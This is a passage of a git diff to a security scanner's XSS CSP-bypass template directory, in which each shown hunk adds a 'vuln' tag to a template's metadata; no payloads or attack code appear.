a/dast/vulnerabilities/xss/csp-bypass/ancestrycdn-angular-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/ancestrycdn-angular-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,ancestrycdn-angular + tags: xss,csp-bypass,ancestrycdn-angular,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/angularjs-code-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/angularjs-code-csp-bypass.yaml index f491f371f3b..6e83e234431 100644 --- a/dast/vulnerabilities/xss/csp-bypass/angularjs-code-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/angularjs-code-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,angularjs-code + tags: xss,csp-bypass,angularjs-code,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/app-link-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/app-link-csp-bypass.yaml index 475e8eb3c32..380e7ca7314 100644 --- a/dast/vulnerabilities/xss/csp-bypass/app-link-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/app-link-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,app-link + tags: xss,csp-bypass,app-link,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/arkoselabs-cdn-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/arkoselabs-cdn-csp-bypass.yaml index 2b5234c151c..30586ea27d7 100644 --- a/dast/vulnerabilities/xss/csp-bypass/arkoselabs-cdn-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/arkoselabs-cdn-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,arkoselabs-cdn + tags: xss,csp-bypass,arkoselabs-cdn,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/arkoselabs-client-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/arkoselabs-client-api-csp-bypass.yaml index e954c57f7d4..8fe85eb3d22 100644 --- a/dast/vulnerabilities/xss/csp-bypass/arkoselabs-client-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/arkoselabs-client-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,arkoselabs-client-api + tags: xss,csp-bypass,arkoselabs-client-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/ayco-portal-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/ayco-portal-csp-bypass.yaml index d3651c2c1c3..14694a49ca2 100644 --- a/dast/vulnerabilities/xss/csp-bypass/ayco-portal-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/ayco-portal-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,ayco-portal + tags: xss,csp-bypass,ayco-portal,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/azure-inno-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/azure-inno-csp-bypass.yaml index 17b0649e08c..59bb8d7146f 100644 --- a/dast/vulnerabilities/xss/csp-bypass/azure-inno-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/azure-inno-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,azure-inno + tags: xss,csp-bypass,azure-inno,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/baidu-map-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/baidu-map-api-csp-bypass.yaml index 869e17abba2..d684713eb15 100644 --- a/dast/vulnerabilities/xss/csp-bypass/baidu-map-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/baidu-map-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,baidu-map-api + tags: xss,csp-bypass,baidu-map-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/baidu-passport-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/baidu-passport-csp-bypass.yaml index 6a29efba603..f9b5d6e7078 100644 --- a/dast/vulnerabilities/xss/csp-bypass/baidu-passport-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/baidu-passport-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,baidu-passport + tags: xss,csp-bypass,baidu-passport,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/battlenet-eu-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/battlenet-eu-csp-bypass.yaml index 4fb63fd14af..9f1f45f8237 100644 --- a/dast/vulnerabilities/xss/csp-bypass/battlenet-eu-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/battlenet-eu-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,battlenet-eu + tags: xss,csp-bypass,battlenet-eu,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/bazaarvoice-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/bazaarvoice-api-csp-bypass.yaml index c7742f9bc52..2cf38678837 100644 --- a/dast/vulnerabilities/xss/csp-bypass/bazaarvoice-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/bazaarvoice-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,bazaarvoice-api + tags: xss,csp-bypass,bazaarvoice-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/bdimg-apps-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/bdimg-apps-csp-bypass.yaml index c3e06241e4a..93fb24ef1e0 100644 --- a/dast/vulnerabilities/xss/csp-bypass/bdimg-apps-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/bdimg-apps-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,bdimg-apps + tags: xss,csp-bypass,bdimg-apps,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/beslist-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/beslist-csp-bypass.yaml index f7fd8e8d90c..355f058a152 100644 --- a/dast/vulnerabilities/xss/csp-bypass/beslist-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/beslist-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,beslist-api + tags: xss,csp-bypass,beslist-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/bing-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/bing-api-csp-bypass.yaml index 996483db07b..34ed8584aa1 100644 --- a/dast/vulnerabilities/xss/csp-bypass/bing-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/bing-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,bing-api + tags: xss,csp-bypass,bing-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/bing-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/bing-csp-bypass.yaml index d77a5bc563a..22c0aa1df7d 100644 --- a/dast/vulnerabilities/xss/csp-bypass/bing-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/bing-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,bing + tags: xss,csp-bypass,bing,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/blogger-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/blogger-api-csp-bypass.yaml index 5500f177612..f5fc84f2130 100644 --- a/dast/vulnerabilities/xss/csp-bypass/blogger-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/blogger-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,blogger-api + tags: xss,csp-bypass,blogger-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/buzzfeed-mango-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/buzzfeed-mango-csp-bypass.yaml index 5e285f26fc3..82b98059554 100644 --- a/dast/vulnerabilities/xss/csp-bypass/buzzfeed-mango-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/buzzfeed-mango-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,buzzfeed-mango + tags: xss,csp-bypass,buzzfeed-mango,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/bytedance-sso-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/bytedance-sso-csp-bypass.yaml index a0a70ac8a53..0cd3d152136 100644 --- a/dast/vulnerabilities/xss/csp-bypass/bytedance-sso-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/bytedance-sso-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,bytedance-sso + tags: xss,csp-bypass,bytedance-sso,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/carbonads-srv-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/carbonads-srv-csp-bypass.yaml index 5a70805c8e3..098c5a6f1a5 100644 --- a/dast/vulnerabilities/xss/csp-bypass/carbonads-srv-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/carbonads-srv-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,carbonads-srv + tags: xss,csp-bypass,carbonads-srv,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/chartbeat-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/chartbeat-api-csp-bypass.yaml index c679b24bb3a..7cb0b41dec7 100644 --- a/dast/vulnerabilities/xss/csp-bypass/chartbeat-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/chartbeat-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,chartbeat-api + tags: xss,csp-bypass,chartbeat-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/clients6-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/clients6-csp-bypass.yaml index e8ec4e3781e..74c91e37002 100644 --- a/dast/vulnerabilities/xss/csp-bypass/clients6-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/clients6-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,clients6 + tags: xss,csp-bypass,clients6,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/cloudflare-cdn-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/cloudflare-cdn-csp-bypass.yaml index f8a203afd86..3942c900775 100644 --- a/dast/vulnerabilities/xss/csp-bypass/cloudflare-cdn-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/cloudflare-cdn-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,cloudflare-cdn + tags: xss,csp-bypass,cloudflare-cdn,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/cloudflare-challenges-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/cloudflare-challenges-csp-bypass.yaml index d9c4fc4f9dd..69740c7b164 100644 --- a/dast/vulnerabilities/xss/csp-bypass/cloudflare-challenges-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/cloudflare-challenges-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,cloudflare-challenges + tags: xss,csp-bypass,cloudflare-challenges,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/cloudflare-info-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/cloudflare-info-csp-bypass.yaml index 33885679b52..cb75644ccd5 100644 --- a/dast/vulnerabilities/xss/csp-bypass/cloudflare-info-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/cloudflare-info-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,cloudflare-info + tags: xss,csp-bypass,cloudflare-info,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/cloudfront-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/cloudfront-csp-bypass.yaml index fe24e1fe559..8b2677a0301 100644 --- a/dast/vulnerabilities/xss/csp-bypass/cloudfront-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/cloudfront-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,cloudfront + tags: xss,csp-bypass,cloudfront,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/coinbase-commerce-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/coinbase-commerce-csp-bypass.yaml index f2bb097c09f..a147989efb4 100644 --- a/dast/vulnerabilities/xss/csp-bypass/coinbase-commerce-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/coinbase-commerce-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,coinbase-commerce + tags: xss,csp-bypass,coinbase-commerce,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/coinbase-investor-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/coinbase-investor-csp-bypass.yaml index 43a8dc6a70b..caa8cb8ef1a 100644 --- a/dast/vulnerabilities/xss/csp-bypass/coinbase-investor-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/coinbase-investor-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,coinbase-investor + tags: xss,csp-bypass,coinbase-investor,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/crisp-client-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/crisp-client-csp-bypass.yaml index 4801e45512d..e20ea2c1b36 100644 --- a/dast/vulnerabilities/xss/csp-bypass/crisp-client-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/crisp-client-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,crisp-client + tags: xss,csp-bypass,crisp-client,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/criteo-cas-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/criteo-cas-csp-bypass.yaml index db6f50a72a4..e24e5eef735 100644 --- a/dast/vulnerabilities/xss/csp-bypass/criteo-cas-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/criteo-cas-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,criteo-cas + tags: xss,csp-bypass,criteo-cas,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/criteo-dynamic-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/criteo-dynamic-csp-bypass.yaml index 29de2c7e65d..9bd182b286d 100644 --- a/dast/vulnerabilities/xss/csp-bypass/criteo-dynamic-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/criteo-dynamic-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,criteo-dynamic + tags: xss,csp-bypass,criteo-dynamic,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/criteo-gum-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/criteo-gum-csp-bypass.yaml index 4dc72327601..40a1a1b4ba2 100644 --- a/dast/vulnerabilities/xss/csp-bypass/criteo-gum-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/criteo-gum-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,criteo-gum + tags: xss,csp-bypass,criteo-gum,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/cxense-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/cxense-api-csp-bypass.yaml index d609dda9536..410915e4926 100644 --- a/dast/vulnerabilities/xss/csp-bypass/cxense-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/cxense-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,cxense-api + tags: xss,csp-bypass,cxense-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/dailymotion-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/dailymotion-api-csp-bypass.yaml index d6b08552430..0611e77a5bd 100644 --- a/dast/vulnerabilities/xss/csp-bypass/dailymotion-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/dailymotion-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,dailymotion-api + tags: xss,csp-bypass,dailymotion-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/dblp-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/dblp-csp-bypass.yaml index 12a6f6d59ef..ba3a3b44e17 100644 --- a/dast/vulnerabilities/xss/csp-bypass/dblp-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/dblp-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,dblp + tags: xss,csp-bypass,dblp,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/demdex-dpm-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/demdex-dpm-csp-bypass.yaml index a49bd6363eb..4323ea66438 100644 --- a/dast/vulnerabilities/xss/csp-bypass/demdex-dpm-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/demdex-dpm-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,demdex-dpm + tags: xss,csp-bypass,demdex-dpm,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/digitalocean-anchor-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/digitalocean-anchor-csp-bypass.yaml index 70ba67976b2..6c70643f3b3 100644 --- a/dast/vulnerabilities/xss/csp-bypass/digitalocean-anchor-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/digitalocean-anchor-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,digitalocean-anchor + tags: xss,csp-bypass,digitalocean-anchor,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/disqus-links-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/disqus-links-csp-bypass.yaml index 48f837d4ca7..62099b1dbc1 100644 --- a/dast/vulnerabilities/xss/csp-bypass/disqus-links-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/disqus-links-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,disqus-links + tags: xss,csp-bypass,disqus-links,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/doubleclick-pubads-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/doubleclick-pubads-csp-bypass.yaml index 8045067dc45..da43aa506fe 100644 --- a/dast/vulnerabilities/xss/csp-bypass/doubleclick-pubads-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/doubleclick-pubads-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,doubleclick-pubads + tags: xss,csp-bypass,doubleclick-pubads,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/doubleclick-securepubads-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/doubleclick-securepubads-csp-bypass.yaml index 30ddd55c760..81330a9c9cb 100644 --- a/dast/vulnerabilities/xss/csp-bypass/doubleclick-securepubads-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/doubleclick-securepubads-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,doubleclick-securepubads + tags: xss,csp-bypass,doubleclick-securepubads,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/duckduckgo-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/duckduckgo-api-csp-bypass.yaml index 565c1f88547..385249e2768 100644 --- a/dast/vulnerabilities/xss/csp-bypass/duckduckgo-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/duckduckgo-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,duckduckgo-api + tags: xss,csp-bypass,duckduckgo-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/elastic-info-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/elastic-info-csp-bypass.yaml index 7b54a20d25b..9602e3fb387 100644 --- a/dast/vulnerabilities/xss/csp-bypass/elastic-info-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/elastic-info-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,elastic-info + tags: xss,csp-bypass,elastic-info,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/ethicalads-server-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/ethicalads-server-csp-bypass.yaml index 619685de448..b33562beb2e 100644 --- a/dast/vulnerabilities/xss/csp-bypass/ethicalads-server-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/ethicalads-server-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,ethicalads-server + tags: xss,csp-bypass,ethicalads-server,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/facebook-graph-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/facebook-graph-csp-bypass.yaml index 94090f3208c..5897c226e64 100644 --- a/dast/vulnerabilities/xss/csp-bypass/facebook-graph-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/facebook-graph-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,facebook-graph + tags: xss,csp-bypass,facebook-graph,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/fastly-storemapper-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/fastly-storemapper-csp-bypass.yaml index 644bcd777e7..8cf81d1b60f 100644 --- a/dast/vulnerabilities/xss/csp-bypass/fastly-storemapper-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/fastly-storemapper-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,fastly-storemapper + tags: xss,csp-bypass,fastly-storemapper,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/firebaseio-rentokil-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/firebaseio-rentokil-csp-bypass.yaml index 008118547a8..975cdf989a1 100644 --- a/dast/vulnerabilities/xss/csp-bypass/firebaseio-rentokil-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/firebaseio-rentokil-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,firebaseio-rentokil + tags: xss,csp-bypass,firebaseio-rentokil,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/flickr-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/flickr-api-csp-bypass.yaml index 06d12c2d7b2..6d753f8d951 100644 --- a/dast/vulnerabilities/xss/csp-bypass/flickr-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/flickr-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,flickr-api + tags: xss,csp-bypass,flickr-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/forismatic-api-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/forismatic-api-csp-bypass.yaml index 99808ac7231..b868f24729c 100644 --- a/dast/vulnerabilities/xss/csp-bypass/forismatic-api-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/forismatic-api-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,forismatic-api + tags: xss,csp-bypass,forismatic-api,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/fqtag-query-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/fqtag-query-csp-bypass.yaml index c77557a42be..8ef904bec30 100644 --- a/dast/vulnerabilities/xss/csp-bypass/fqtag-query-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/fqtag-query-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,fqtag-query + tags: xss,csp-bypass,fqtag-query,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/fqtag-s-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/fqtag-s-csp-bypass.yaml index 59acd53eb0d..935775b11f9 100644 --- a/dast/vulnerabilities/xss/csp-bypass/fqtag-s-csp-bypass.yaml +++ b/dast/vulnerabilities/xss/csp-bypass/fqtag-s-csp-bypass.yaml @@ -8,7 +8,7 @@ info: - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true - tags: xss,csp-bypass,fqtag-s + tags: xss,csp-bypass,fqtag-s,vuln flow: http(1) && headless(1) diff --git a/dast/vulnerabilities/xss/csp-bypass/fwmrm-csp-bypass.yaml b/dast/vulnerabilities/xss/csp-bypass/fwmrm-csp-bypass.yaml index a57624fcaa0..c7a9f1c2270 100644 --- 